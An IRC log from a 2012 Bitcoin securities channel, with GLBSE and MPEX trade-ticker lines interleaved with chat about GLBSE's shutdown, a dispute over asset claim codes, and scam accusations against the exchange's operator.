01:37:22 lol Sep 25 01:39:12 glbse down again :-/ Sep 25 01:44:33 [GLBSE] [OBSI.HRPT] 28 @ 0.05500001 = 1.54 BTC [-] Sep 25 01:44:33 [GLBSE] [OBSI.HRPT] 100 @ 0.055 = 5.5 BTC [-] Sep 25 01:44:35 [GLBSE] [OBSI.HRPT] 1 @ 0.0521 BTC [-] Sep 25 01:44:36 [GLBSE] [OBSI.HRPT] 10 @ 0.052 = 0.52 BTC [-] Sep 25 01:44:37 [GLBSE] [OBSI.HRPT] 4 @ 0.05101542 = 0.2041 BTC [-] Sep 25 01:44:38 [GLBSE] [OBSI.HRPT] 7 @ 0.051 = 0.357 BTC [-] Sep 25 01:44:54 i guess that was the best short i ever did. Sep 25 01:45:32 did you buy to close yet? Sep 25 01:45:48 or were you able to settle in cash :o Sep 25 01:46:14 You shorted OBSI? Sep 25 01:46:32 smickles im not closing. Sep 25 01:46:39 BTC-Mining well yes. Sep 25 01:46:43 I should have done that. I always forget about the possibility of shorting. Sep 25 01:46:58 When I don't want to invest in something, I should short it. Sep 25 01:47:01 well it's a pain to arrange share loands Sep 25 01:47:15 Yes, but it's worth it with good picks. Sep 25 01:47:21 [GLBSE] [CIUCIU.BOND] 800 @ 0.1001 = 80.08 BTC [+] Sep 25 01:47:23 [GLBSE] [CIUCIU.BOND] 54 @ 0.10000001 = 5.4 BTC [-] Sep 25 01:47:24 [GLBSE] [CIUCIU.BOND] 300 @ 0.1 = 30 BTC [-] Sep 25 01:47:33 BTC-Mining: is it, with such shallow bid depth on all the assets? Sep 25 01:47:46 copumpkin obsi is like the #1 by volume on glbse Sep 25 01:48:00 which in itself is a sad statement Sep 25 01:48:00 which is like saying you're the smartest retard in the room! Sep 25 01:48:02 ;) Sep 25 01:48:04 yep Sep 25 01:49:57 [GLBSE] [BTCS] 39 @ 0.0105 = 0.4095 BTC [-] Sep 25 01:49:59 [GLBSE] [BTCS] 50 @ 0.01 = 0.5 BTC [-] Sep 25 02:01:03 [MPEX] [S.MPOE] 62200 @ 0.00035 = 21.77 BTC [-] Sep 25 02:08:03 stupid linode Sep 25 02:08:21 stupid kids ddos'ing me Sep 25 02:10:09 [GLBSE] [CIUCIU.BOND] 180 @ 0.1 = 18 BTC [-] Sep 25 02:15:11 [GLBSE] [CIUCIU.BOND] 100 @ 0.1 = 10 BTC [-] Sep 25 02:25:05 dub: Tell linode their clients probably have approximatevily one neural node in their brain, max. Sep 25 02:27:03 [MPEX] [F.GIGA.ETF] 6193 @ 0.00029 = 1.796 BTC [-] Sep 25 02:27:36 [GLBSE] [HYDRO.BONDS] 1 @ 1.4469 BTC [+] Sep 25 02:35:29 [GLBSE] [RSM] 1 @ 0.29 BTC [+] Sep 25 02:36:04 [GLBSE] [NASTY] 2 @ 0.47 = 0.94 BTC [+] Sep 25 02:36:42 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.86 BTC [-] Sep 25 02:41:42 [GLBSE] [GSDPT] 2 @ 0.0033 = 0.0066 BTC [+] Sep 25 02:45:48 [GLBSE] [GIGAMINING] 5 @ 0.57979997 = 2.899 BTC [-] Sep 25 02:49:08 [GLBSE] [KRAKEN] 43 @ 0.009 = 0.387 BTC [+] Sep 25 02:52:53 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.86 BTC [-] Sep 25 02:56:02 [MPEX] [F.GIGA.ETF] 12523 @ 0.00029 = 3.6317 BTC [-] Sep 25 02:58:11 [GLBSE] [KRAKEN] 2 @ 0.009 = 0.018 BTC [+] Sep 25 03:04:09 Bah, I don't have any orders being filled these days. **** BEGIN LOGGING AT Tue Sep 25 10:36:48 2012 Sep 25 10:46:46 [GLBSE] [OBSI.HRPT] 59 @ 0.05399999 = 3.186 BTC [-] Sep 25 10:46:48 [GLBSE] [OBSI.HRPT] 41 @ 0.054 = 2.214 BTC [+] Sep 25 10:48:25 [GLBSE] [NYAN.C] 2 @ 0.23 = 0.46 BTC [-] Sep 25 10:51:31 [GLBSE] [OBSI.HRPT] 1 @ 0.05399999 BTC [-] Sep 25 10:51:32 [GLBSE] [OBSI.HRPT] 9 @ 0.054 = 0.486 BTC [+] Sep 25 10:51:34 [GLBSE] [OBSI.HRPT] 29 @ 0.05499996 = 1.595 BTC [+] Sep 25 10:52:16 [GLBSE] [OBSI.HRPT] 1 @ 0.05499997 BTC [+] Sep 25 10:56:04 [MPEX] [F.GIGA.ETF] 8125 @ 0.00028439 = 2.3107 BTC [-] Sep 25 10:56:05 [MPEX] [F.GIGA.ETF] 7100 @ 0.00028263 = 2.0067 BTC [-] Sep 25 10:56:06 [MPEX] [F.GIGA.ETF] 75 @ 0.00028262 = 0.0212 BTC [-] Sep 25 10:56:15 [GLBSE] [RAREEARTH] 10 @ 0.01 = 0.1 BTC [+] Sep 25 10:57:19 [GLBSE] [SILVER] 1 @ 0.009939 BTC [+] Sep 25 10:57:20 [GLBSE] [SILVER] 9 @ 0.009939 = 0.0895 BTC [+] Sep 25 11:00:11 https://bitcointalk.org/index.php?topic=105352.msg1218405#msg1218405 Sep 25 11:00:20 lol that phin gage guy... Sep 25 11:04:08 [GLBSE] [PUREMINING] 2 @ 0.1077 = 0.2154 BTC [-] Sep 25 11:11:37 Mt.Gox - Temporary suspension of all GBP Deposits via Barclays Sep 25 11:12:14 [GLBSE] [OBSI.HRPT] 63 @ 0.04002001 = 2.5213 BTC [-] Sep 25 11:12:15 [GLBSE] [OBSI.HRPT] 37 @ 0.04002 = 1.4807 BTC [-] Sep 25 11:14:30 ;;lastseen Nefario Sep 25 11:14:31 Error: "lastseen" is not a valid command. Sep 25 11:14:35 ;;seen Nefario Sep 25 11:14:36 Nefario was last seen in #bitcoin-assets 12 hours, 14 minutes, and 40 seconds ago: Those assets are not listed or traded anymore Sep 25 11:14:41 ;;seen Nefario1 Sep 25 11:14:41 Nefario1 was last seen in #bitcoin-assets 6 days, 8 hours, 36 minutes, and 4 seconds ago: the sky is falling Sep 25 11:16:40 [GLBSE] [COGNITIVE] 1 @ 0.567 BTC [+] Sep 25 11:23:04 [MPEX] [F.GIGA.ETF] 2500 @ 0.00028262 = 0.7066 BTC [-] Sep 25 11:44:19 [GLBSE] [OBSI.HRPT] 31 @ 0.04010001 = 1.2431 BTC [+] Sep 25 11:44:21 [GLBSE] [OBSI.HRPT] 10 @ 0.0401 = 0.401 BTC [-] Sep 25 11:44:21 [GLBSE] [OBSI.HRPT] 17 @ 0.04004001 = 0.6807 BTC [-] Sep 25 11:44:22 [GLBSE] [OBSI.HRPT] 3 @ 0.04004 = 0.1201 BTC [-] Sep 25 11:44:24 [GLBSE] [OBSI.HRPT] 17 @ 0.04002001 = 0.6803 BTC [-] Sep 25 11:44:25 [GLBSE] [OBSI.HRPT] 3 @ 0.04002 = 0.1201 BTC [-] Sep 25 11:44:26 [GLBSE] [OBSI.HRPT] 19 @ 0.04000001 = 0.76 BTC [-] Sep 25 11:45:08 !pl obsi.hrpt .1 Sep 25 11:45:08 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 25 11:45:45 OBSI.HRPT [1@0.1BTC] paid: 0.068445 BTC. Last price: 0.04000001 BTC. Capital gain: -0.05999999 BTC. Total: 0.00844501 BTC. (8.4%) Sep 25 11:46:24 [GLBSE] [OBSI.ABMO] 1 @ 0.1 BTC [+] Sep 25 11:46:46 [GLBSE] [OBSI.ABMO] 1 @ 0.07000001 BTC [-] Sep 25 11:48:01 [GLBSE] [OBSI.HRPT] 18 @ 0.05499998 = 0.99 BTC [+] Sep 25 11:48:36 [MPEX] [F.GIGA.ETF] 5324 @ 0.00028262 = 1.5047 BTC [-] Sep 25 11:48:37 [MPEX] [F.GIGA.ETF] 6700 @ 0.00028213 = 1.8903 BTC [-] Sep 25 11:48:38 [MPEX] [F.GIGA.ETF] 3676 @ 0.00028174 = 1.0357 BTC [-] Sep 25 11:49:44 is the name and contact information for the GLBSE administrator, Nefario, public? Sep 25 11:50:20 yep Sep 25 11:50:29 google it and I am sure you will find it Sep 25 11:52:24 lmao these noobs Sep 25 11:52:32 join irc, ask a q, dc the next minute Sep 25 11:57:31 [GLBSE] [NYAN.B] 1 @ 0.97 BTC [-] Sep 25 11:57:32 [GLBSE] [NYAN.B] 1 @ 0.96 BTC [-] Sep 25 11:57:33 [GLBSE] [NYAN.B] 1 @ 0.95 BTC [-] Sep 25 11:59:50 [GLBSE] [OBSI.HRPT] 60 @ 0.04002001 = 2.4012 BTC [-] Sep 25 11:59:52 [GLBSE] [OBSI.HRPT] 36 @ 0.04002 = 1.4407 BTC [-] Sep 25 11:59:53 [GLBSE] [OBSI.HRPT] 124 @ 0.04000001 = 4.96 BTC [-] Sep 25 12:01:34 [GLBSE] [NYAN.A] 9 @ 1 = 9 BTC [-] Sep 25 12:01:50 https://bitcointalk.org/index.php?topic=112551 wtf ?! Sep 25 12:03:28 [GLBSE] [OBSI.HRPT] 2 @ 0.05499998 = 0.11 BTC [+] Sep 25 12:06:22 [GLBSE] [GSDPT] 1000 @ 0.0033 = 3.3 BTC [+] Sep 25 12:13:37 [GLBSE] [KRAKEN] 29 @ 0.009 = 0.261 BTC [+] Sep 25 12:13:39 wtf indeed Sep 25 12:15:47 is nefario trying to fuck over theymos by driving the share value down? Sep 25 12:16:04 [MPEX] [F.GIGA.ETF] 4474 @ 0.00028174 = 1.2605 BTC [-] Sep 25 12:16:04 [MPEX] [F.GIGA.ETF] 726 @ 0.00028131 = 0.2042 BTC [-] Sep 25 12:18:48 [GLBSE] [OBSI.HRPT] 30 @ 0.04002001 = 1.2006 BTC [-] Sep 25 12:19:57 [GLBSE] [OBSI.HRPT] 9 @ 0.04002 = 0.3602 BTC [-] Sep 25 12:20:20 [GLBSE] [OBSI.HRPT] 63 @ 0.04000001 = 2.52 BTC [-] Sep 25 12:22:13 [GLBSE] [GSDPT] 2000 @ 0.0033 = 6.6 BTC [+] Sep 25 12:22:19 [GLBSE] [HYDRO.BONDS] 1 @ 1.375 BTC [-] Sep 25 12:22:21 [GLBSE] [HYDRO.BONDS] 2 @ 1.3741 = 2.7482 BTC [-] Sep 25 12:22:22 [GLBSE] [HYDRO.BONDS] 5 @ 1.374 = 6.87 BTC [-] Sep 25 12:22:30 i think nefario should be able to do whatever he wants Sep 25 12:22:35 using glbse is a priv. not a right Sep 25 12:23:14 he isnt hurting just goat but all the investors. Sep 25 12:24:02 rg as someone said in there, it's game over for it at this point. Sep 25 12:29:33 Chaang-Noi o hi there. having fun this morn ? Sep 25 12:29:47 yes Sep 25 12:29:58 i had civit coffee for the first time ever Sep 25 12:30:08 its rather mild, not bitter at all Sep 25 12:30:24 i cant drink it daily cuz of the price, but glad i had it once. Sep 25 12:30:24 are you going to just walk away from the glbse assets ? Sep 25 12:30:31 from a game theory perspective it seems the best avenue for you./ Sep 25 12:31:04 im not going anywhere. i assume the asset holders will go to the police and something will be worked out. nefario more or less stole their assets. Sep 25 12:31:27 right Sep 25 12:31:42 how much were you worth ? something in the 8k range or so ? Sep 25 12:31:47 great, i will buy back your tygrr asset right now Sep 25 12:32:15 i dont have the lists Sep 25 12:32:26 send me your assets and i will pay for them right now... Sep 25 12:33:01 if i relist them somewhere else it will be a new assets and if sued i will still ahve to cover the ones on glbse. Sep 25 12:33:21 "claim codes" were send in plane text via eimail... Sep 25 12:33:35 there is no way to know these were from nefario and that real assets holders ahve them Sep 25 12:33:57 there is no way to know that nefario is not just claiming btc over and over Sep 25 12:34:14 i will not accept your code, i will only accept your tygrr asset. Sep 25 12:34:19 the code is worthless Sep 25 12:34:22 i never sold you a code Sep 25 12:34:30 the code is not the asset oh lol Sep 25 12:34:39 go for it. Sep 25 12:34:49 once nefario calms down and relists the assets i will make good on them Sep 25 12:35:19 there is no way i can make good on this, if someone hands out that code to their friend or two and i have 50 people claiming they need btc it will be a mess Sep 25 12:35:31 you really need to think about how silly this is before you post on the forum Sep 25 12:35:55 yes, once nefario hands me the assets i will deal with it. Sep 25 12:36:12 what if the first code for 50% is just nefario? Sep 25 12:36:21 then 50% of the people call me scammer and nefario takes my coin Sep 25 12:36:42 im willing to look into the moving the assets to a new exchange Sep 25 12:36:57 however the code system is retarded Sep 25 12:38:02 you have to understand that your code is not an asset. it was sent in plain text and nefario and who knows who else ahs that list. Sep 25 12:38:23 nefario can use the code on a differnt exchange and claim all the btc Sep 25 12:38:29 btw nefario still has the btc Sep 25 12:38:38 how many people ahve a copy of that list? Sep 25 12:38:43 how many people can use your code? Sep 25 12:38:59 you imagine? Sep 25 12:39:17 i dont think you understand... Sep 25 12:39:43 what is stopping nefario from claiming all the codes? or frm me claiming all the cods and saying nefario did it? Sep 25 12:39:56 the code system is not a safe or vailid way to do it Sep 25 12:40:02 im open to doing it in a safe way. Sep 25 12:40:12 that is what im saying Sep 25 12:40:26 i could just say i paid everyone on the list and no one could say other wise.. its silly Sep 25 12:40:35 and i could pay out and people could still bitch Sep 25 12:40:39 its not a valid system Sep 25 12:40:45 a claim code is not an asset Sep 25 12:40:51 there is a better way to do this. Sep 25 12:41:18 try to take this idea to the forum and see what sort of responces you get... Sep 25 12:41:31 link it to me so maybe the can show me how safe and legal this code system is Sep 25 12:41:46 honor what system? Sep 25 12:42:01 i never agreed to that system, lol Sep 25 12:42:33 [MPEX] [S.MPOE] 4200 @ 0.00035614 = 1.4958 BTC [-] Sep 25 12:42:45 [MPEX] [S.DICE] 25191 @ 0.0034 = 85.6494 BTC [+] Sep 25 12:42:53 claims code = glbse assets? that is just silly. Sep 25 12:43:26 you and nefario have not thought out all of the problems with this. Sep 25 12:43:41 what a mess. I invested a little of my spare capital (2000 btc) with the intention of helping the bitcoin community grow, and it turned out to be an headache and a pita. I have no time to manage all those things that are happening... therefore I am getting out of GLBSE as much as I can. I lost ~ 20% of invested funds. Sep 25 12:43:58 aga http://polimedia.us/dtng/c/src/134654389322.png Sep 25 12:44:04 glbse has nothing to do with the btc community. Sep 25 12:44:09 it's just a congregation of scammers Sep 25 12:44:17 the same people that did the bitcoinica fiasco. Sep 25 12:44:26 lol Sep 25 12:44:30 smoovious i know you are upset but i did not delist my assets. Sep 25 12:45:15 there is no way that using the claim code system will cover me legally. Sep 25 12:45:23 nefario has the btc Sep 25 12:45:28 he will be the one ripping you off Sep 25 12:45:44 what is a fair price for your shares? Sep 25 12:45:51 can i just pick my price? Sep 25 12:46:05 so you get to pick? Sep 25 12:46:12 and im forced to take whatever you demand? Sep 25 12:46:32 you want me to negotiate with 1000 differnt people? Sep 25 12:46:35 no fucking way. Sep 25 12:46:51 i would need to charge a fee for that that would take away most of the holders wealth Sep 25 12:47:44 you get to tell me what to do cuz you bought an asset on glbse? Sep 25 12:47:51 who is going to broker all of the negotations? Sep 25 12:47:59 that is why we have an exchange... Sep 25 12:48:14 im not going to charge a fee, im just showing how silly what you want to do is. Sep 25 12:48:20 i cant deal with 1000 people Sep 25 12:49:12 [GLBSE] [YABMC] 1 @ 0.08199998 BTC [+] Sep 25 12:49:14 [GLBSE] [YABMC] 9 @ 0.08199999 = 0.738 BTC [+] Sep 25 12:49:18 how can you prove to me that your code is yours and you really hold that asset? Sep 25 12:49:45 prove to me nefario did not giv you that code to fuck me over Sep 25 12:49:54 rg https://bitcointalk.org/index.php?topic=112312.0 Sep 25 12:50:08 chaang: really? Sep 25 12:50:13 if you evre said that officially Sep 25 12:50:20 people would call you a scammer instantly Sep 25 12:50:34 a claim code is not an asset. Sep 25 12:50:52 i want to buy back the tygrr assets and need to get them from glbse. Sep 25 12:51:05 [GLBSE] [PUREMINING] 1 @ 0.10000001 BTC [-] Sep 25 12:51:07 [GLBSE] [PUREMINING] 7 @ 0.1 = 0.7 BTC [-] Sep 25 12:51:26 glbse is the one who is preventing this from going down not me. Sep 25 12:51:41 i think that a lot of people would disagree with that stateent Sep 25 12:51:41 rg say what officially ? Sep 25 12:51:54 mircea_popescu: [05:49] prove to me nefario did not giv you that code to fuck me over Sep 25 12:52:00 that's just paranoid bullshit Sep 25 12:52:06 people will see right through it Sep 25 12:52:08 im very happy to buy your valid assets Sep 25 12:52:25 i doubt it Sep 25 12:52:29 Chaang, given your position have you contacted GLBSE and told them these codes are unacceptable, and suggested an alternative method? Sep 25 12:52:35 at this point i can see that as a distinct possibility Sep 25 12:52:50 a claim code is not valid,. if i start paying out, and nefario relists the assets i have to pay twice... Sep 25 12:53:26 i have on the forum yes. they want me to agree to their terms and then they will send me back my btc but so far i will not agree... they know i did not agree Sep 25 12:53:45 basically i'd say scammer tag for nefario is warranted at this point. Sep 25 12:53:49 moreover Sep 25 12:54:18 Thanks Smoovious you have been so helpful in resolving this. nefario delisted me cuz he wanted something i had and would not give it to him. Sep 25 12:54:31 ;;eauth mircea_popescu Sep 25 12:54:32 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@trilema/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Sep 25 12:54:54 ;;everify freenode:#bitcoin-otc:0b3e1f34714f3bd63a310ee316b8597f9e7931c94842d17d29c29894 Sep 25 12:54:55 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Sep 25 12:55:21 ;;rate Nefario -1 runs a scammy btc securities "exchange". associated with the bitcoin consultancy scammer group. Sep 25 12:55:22 Rating entry successful. Your rating of -1 for user Nefario has been recorded. Sep 25 12:55:39 well we are big boys Smoovious im sure Nefario will calm down and relist Sep 25 12:55:54 up to him Sep 25 12:56:05 im off to play baseball with my son. have a great day guys. Sep 25 12:56:38 enjoy Sep 25 13:00:16 [GLBSE] [PUREMINING] 1 @ 0.1069 BTC [+] Sep 25 13:03:43 [MPEX] [O.BTCUSD.P120T] 470 @ 0.03400333 = 15.9816 BTC [-] Sep 25 13:04:33 [MPEX] [S.MPOE] 36965 @ 0.00035614 = 13.1647 BTC [-] Sep 25 13:04:34 [MPEX] [S.MPOE] 23400 @ 0.00035524 = 8.3126 BTC [-] Sep 25 13:04:36 [MPEX] [S.MPOE] 46700 @ 0.00035434 = 16.5477 BTC [-] Sep 25 13:04:37 [MPEX] [S.MPOE] 12935 @ 0.00035409 = 4.5802 BTC [-] Sep 25 13:05:32 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.16994353 = 169.9435 BTC [-] Sep 25 13:06:27 [MPEX] [S.DICE] 1500 @ 0.0034 = 5.1 BTC [+] Sep 25 13:14:55 [GLBSE] [GSDPT] 1 @ 0.00328 BTC [-] Sep 25 13:28:12 [GLBSE] [PUREMINING] 1 @ 0.09263 BTC [-] Sep 25 13:29:04 [GLBSE] [OBSI.HRPT] 1 @ 0.05099997 BTC [+] Sep 25 13:33:04 [MPEX] [F.GIGA.ETF] 422 @ 0.00028131 = 0.1187 BTC [-] Sep 25 13:33:05 [MPEX] [F.GIGA.ETF] 8574 @ 0.00028131 = 2.412 BTC [-] Sep 25 13:33:07 [MPEX] [F.GIGA.ETF] 186 @ 0.00028115 = 0.0523 BTC [-] Sep 25 13:52:57 [GLBSE] [GMVT-BOT] 1 @ 0.1000001 BTC [+] Sep 25 13:52:59 [GLBSE] [GMVT-BOT] 1 @ 0.10000002 BTC [-] Sep 25 13:53:00 [GLBSE] [GMVT-BOT] 24 @ 0.1 = 2.4 BTC [-] Sep 25 13:53:01 [GLBSE] [GMVT-BOT] 1 @ 0.0992 BTC [-] Sep 25 13:53:02 [GLBSE] [GMVT-BOT] 23 @ 0.09 = 2.07 BTC [-] Sep 25 13:54:05 [GLBSE] [OBSI.HRPT] 81 @ 0.049 = 3.969 BTC [-] Sep 25 13:54:06 [GLBSE] [OBSI.HRPT] 11 @ 0.05 = 0.55 BTC [+] Sep 25 13:54:35 [GLBSE] [OBSI.HRPT] 8 @ 0.05 = 0.4 BTC [+] Sep 25 14:02:04 [MPEX] [F.GIGA.ETF] 8814 @ 0.00028115 = 2.4781 BTC [-] Sep 25 14:02:06 [MPEX] [F.GIGA.ETF] 286 @ 0.00028016 = 0.0801 BTC [-] Sep 25 14:10:36 [GLBSE] [FPGAMINING] 4 @ 0.124 = 0.496 BTC [+] Sep 25 14:11:44 [GLBSE] [BITBOND] 2 @ 0.3351 = 0.6702 BTC [-] Sep 25 14:11:45 [GLBSE] [BITBOND] 1 @ 0.3351 BTC [-] Sep 25 14:13:12 [GLBSE] [GIGAMINING] 1 @ 0.58001105 BTC [-] Sep 25 14:14:27 [GLBSE] [GIGAMINING] 1 @ 0.58001104 BTC [-] Sep 25 14:15:44 [GLBSE] [GIGAMINING] 1 @ 0.58001104 BTC [-] Sep 25 14:17:26 [GLBSE] [OBSI.HRPT] 5 @ 0.04002 = 0.2001 BTC [-] Sep 25 14:18:20 [GLBSE] [YABMC] 1 @ 0.0818 BTC [-] Sep 25 14:18:31 [GLBSE] [PUREMINING] 1 @ 0.09263 BTC [-] Sep 25 14:20:01 [GLBSE] [DMC] 10 @ 0.03 = 0.3 BTC [+] Sep 25 14:20:26 [GLBSE] [YABMC] 1 @ 0.06122 BTC [-] Sep 25 14:21:20 [GLBSE] [YABMC] 1 @ 0.06122001 BTC [+] Sep 25 14:22:41 [GLBSE] [PUREMINING] 2 @ 0.092612 = 0.1852 BTC [-] Sep 25 14:25:14 [GLBSE] [SS] 25 @ 0.01511 = 0.3778 BTC [-] Sep 25 14:27:43 [GLBSE] [NYAN.C] 2 @ 0.1402 = 0.2804 BTC [-] Sep 25 14:28:04 [MPEX] [S.MPOE] 3800 @ 0.00035409 = 1.3455 BTC [-] Sep 25 14:28:24 [GLBSE] [NYAN.C] 10 @ 0.14 = 1.4 BTC [-] Sep 25 14:29:14 [GLBSE] [NYAN.C] 4 @ 0.1302 = 0.5208 BTC [-] Sep 25 14:29:15 [GLBSE] [NYAN.C] 10 @ 0.13 = 1.3 BTC [-] Sep 25 14:29:32 [GLBSE] [NYAN.C] 10 @ 0.12 = 1.2 BTC [-] Sep 25 14:29:52 [GLBSE] [NYAN.C] 10 @ 0.11 = 1.1 BTC [-] Sep 25 14:31:21 [GLBSE] [NYAN.C] 10 @ 0.1 = 1 BTC [-] Sep 25 14:31:39 [GLBSE] [NYAN.C] 9 @ 0.09 = 0.81 BTC [-] Sep 25 14:39:30 someone throwing in the towel on NYAN.C…damn that's low Sep 25 14:40:51 [GLBSE] [OBSI.HRPT] 8 @ 0.04002 = 0.3202 BTC [-] Sep 25 14:44:33 [GLBSE] [OBSI.HRPT] 51 @ 0.04002 = 2.041 BTC [-] Sep 25 14:45:35 [GLBSE] [OBSI.HRPT] 22 @ 0.045 = 0.99 BTC [+] Sep 25 14:48:25 [GLBSE] [PUREMINING] 4 @ 0.092612 = 0.3704 BTC [-] Sep 25 14:52:15 [GLBSE] [BTC-BOND] 1 @ 0.0099 BTC [-] Sep 25 14:52:47 [GLBSE] [BTC-BOND] 1 @ 0.00210001 BTC [-] Sep 25 14:54:07 [GLBSE] [BTC-BOND] 3 @ 0.0099 = 0.0297 BTC [+] Sep 25 14:54:31 [GLBSE] [BTC-BOND] 3 @ 0.0021 = 0.0063 BTC [-] Sep 25 14:55:03 [MPEX] [F.GIGA.ETF] 4200 @ 0.00028016 = 1.1767 BTC [-] Sep 25 14:57:31 [GLBSE] [DMC] 7 @ 0.035 = 0.245 BTC [+] Sep 25 14:58:05 [GLBSE] [BAKEWELL] 2 @ 0.148999 = 0.298 BTC [-] Sep 25 14:59:09 [GLBSE] [RSM] 1 @ 0.29 BTC [+] Sep 25 15:02:45 [GLBSE] [ASICMINER] 15 @ 0.1113 = 1.6695 BTC [-] Sep 25 15:02:46 [GLBSE] [ASICMINER] 30 @ 0.1112 = 3.336 BTC [-] Sep 25 15:02:47 [GLBSE] [ASICMINER] 5 @ 0.110001 = 0.55 BTC [-] Sep 25 15:03:50 [GLBSE] [007] 1 @ 0.07805001 BTC [-] Sep 25 15:03:52 [GLBSE] [007] 5 @ 0.07805 = 0.3903 BTC [-] Sep 25 15:03:53 [GLBSE] [007] 2 @ 0.078 = 0.156 BTC [-] Sep 25 15:03:54 [GLBSE] [007] 2 @ 0.075 = 0.15 BTC [-] Sep 25 15:04:53 [GLBSE] [BMF] 1 @ 0.45 BTC [+] Sep 25 15:04:55 [GLBSE] [BMF] 1 @ 0.44 BTC [-] Sep 25 15:04:56 [GLBSE] [BMF] 1 @ 0.43 BTC [-] Sep 25 15:04:57 [GLBSE] [BMF] 1 @ 0.42 BTC [-] Sep 25 15:04:59 [GLBSE] [BMF] 6 @ 0.4104 = 2.4624 BTC [-] Sep 25 15:05:27 [GLBSE] [BLUECHIP] 50 @ 0.09 = 4.5 BTC [-] Sep 25 15:11:38 [GLBSE] [OBSI.HRPT] 1 @ 0.03839999 BTC [-] Sep 25 15:11:39 [GLBSE] [OBSI.HRPT] 1 @ 0.034 BTC [-] Sep 25 15:13:13 [GLBSE] [PUREMINING] 2 @ 0.09263 = 0.1853 BTC [+] Sep 25 15:13:15 [GLBSE] [PUREMINING] 37 @ 0.092612 = 3.4266 BTC [-] Sep 25 15:13:16 [GLBSE] [PUREMINING] 3 @ 0.09253 = 0.2776 BTC [-] Sep 25 15:13:17 [GLBSE] [PUREMINING] 1 @ 0.0925121 BTC [-] Sep 25 15:13:18 [GLBSE] [PUREMINING] 32 @ 0.092512 = 2.9604 BTC [-] Sep 25 15:22:04 [MPEX] [F.GIGA.ETF] 314 @ 0.00028016 = 0.088 BTC [-] Sep 25 15:22:06 [MPEX] [F.GIGA.ETF] 1300 @ 0.00027965 = 0.3635 BTC [-] Sep 25 15:28:43 [GLBSE] [YABMC] 1 @ 0.08199996 BTC [+] Sep 25 15:42:04 [MPEX] [O.BTCUSD.C080T] 820 @ 0.33655482 = 275.975 BTC [-] Sep 25 15:45:41 http://www.smbc-comics.com/?db=comics&id=1774#comic Sep 25 15:48:48 [GLBSE] [ASICMINER] 6 @ 0.1168899 = 0.7013 BTC [+] Sep 25 15:49:56 heh Sep 25 15:50:07 i sent bitstamp 700 eur yesterday Sep 25 15:50:13 got 900 usd today - twice Sep 25 15:50:16 lolz Sep 25 15:50:32 yes. i already told em and they took it away. Sep 25 15:51:13 [GLBSE] [GIGAMINING] 1 @ 0.64 BTC [+] Sep 25 15:52:08 lol Sep 25 15:52:18 the one time i paid someone twice i didn't take it away Sep 25 15:52:21 and all i got was a thanks! Sep 25 15:52:23 and it was about 350 btc Sep 25 15:53:03 looks like money has not yet corrupted me. Sep 25 15:54:54 [GLBSE] [BAKEWELL] 1 @ 0.05 BTC [-] Sep 25 15:54:58 [GLBSE] [ASICMINER] 10 @ 0.117899 = 1.179 BTC [+] Sep 25 15:55:04 14:52.10 ( mircea_popescu ) the one time i paid someone twice i didn't take it away Sep 25 15:55:10 because you cant reverse btc ? :) Sep 25 15:55:19 or was it on a paper only Sep 25 15:55:25 [GLBSE] [DMC] 3 @ 0.035 = 0.105 BTC [+] Sep 25 15:55:40 kakobrekla i could have liened their acct. Sep 25 15:55:50 but hey, they weren't at fault, reported it, what was i going to do. Sep 25 15:55:53 mircea_popescu's in the business of giving away btc Sep 25 15:56:14 imsaguy2 i rarely give away btc, but when i do, i don't ask for it back. Sep 25 15:56:27 :D Sep 25 15:56:30 I could have sworn I've seen that in a meme somewhere ;) Sep 25 15:56:35 hehe Sep 25 15:56:40 ya, it was that matthew guy Sep 25 15:56:47 the doubling profits guy Sep 25 15:56:53 the flake? Sep 25 15:57:18 "i may be looking like i'm doing bad/poor business, but twice already i've doubled investor profits before operation has even begun" Sep 25 15:57:24 or something to that effect Sep 25 15:57:29 [GLBSE] [BTCWEB] 1 @ 0.08 BTC [+] Sep 25 15:57:50 [MPEX] [O.BTCUSD.P140T] 500 @ 0.16327907 = 81.6395 BTC [+] Sep 25 15:59:42 [MPEX] [S.DICE] 2200 @ 0.0034 = 7.48 BTC [+] Sep 25 16:01:04 [MPEX] [S.MPOE] 1021 @ 0.00035559 = 0.3631 BTC [+] Sep 25 16:01:06 [MPEX] [S.MPOE] 29700 @ 0.00035686 = 10.5987 BTC [+] Sep 25 16:01:07 [MPEX] [S.MPOE] 47926 @ 0.00035759 = 17.1379 BTC [+] Sep 25 16:01:08 [MPEX] [S.MPOE] 26766 @ 0.00035804 = 9.5833 BTC [+] Sep 25 16:01:10 [MPEX] [S.MPOE] 15000 @ 0.00035894 = 5.3841 BTC [+] Sep 25 16:01:11 [MPEX] [S.MPOE] 10587 @ 0.00035951 = 3.8061 BTC [+] Sep 25 16:09:27 [GLBSE] [OBSI.HRPT] 1 @ 0.039 BTC [+] Sep 25 16:11:57 [GLBSE] [BBBB] 65 @ 0.00016 = 0.0104 BTC [-] Sep 25 16:12:22 [GLBSE] [DI.BFLSC.SUCCEED] 50 @ 0.0009 = 0.045 BTC [-] Sep 25 16:16:30 [GLBSE] [DI.BFLSC.SUCCEED] 200 @ 0.0009 = 0.18 BTC [-] Sep 25 16:21:52 https://bitcointalk.org/index.php?topic=75802.msg1219433#msg1219433 re any questions about f.giga.etf Sep 25 16:26:42 [GLBSE] [BITNODES] 1 @ 0.249 BTC [-] Sep 25 16:27:55 [MPEX] [F.GIGA.ETF] 12321 @ 0.00027895 = 3.4369 BTC [-] Sep 25 16:28:14 so Sep 25 16:28:23 [GLBSE] [GIGAMINING] 1 @ 0.58001101 BTC [-] Sep 25 16:28:30 anyone hear from nefario yet? Sep 25 16:29:13 [GLBSE] [GIGAMINING] 1 @ 0.58001 BTC [-] Sep 25 16:29:36 not rly. Sep 25 16:29:52 oh ho ho Sep 25 16:29:56 theymos is selling his interest in glbse Sep 25 16:30:19 https://bitcointalk.org/index.php?topic=112402.0 Sep 25 16:31:08 yest news Sep 25 16:31:33 im kinda curious, anyone still remembers nefario + the rest of interscamgro recently organised a conference where nobody showed up ? Sep 25 16:31:50 the one in london that just happened? Sep 25 16:32:41 yeah Sep 25 16:32:56 apparently a few people DID show up Sep 25 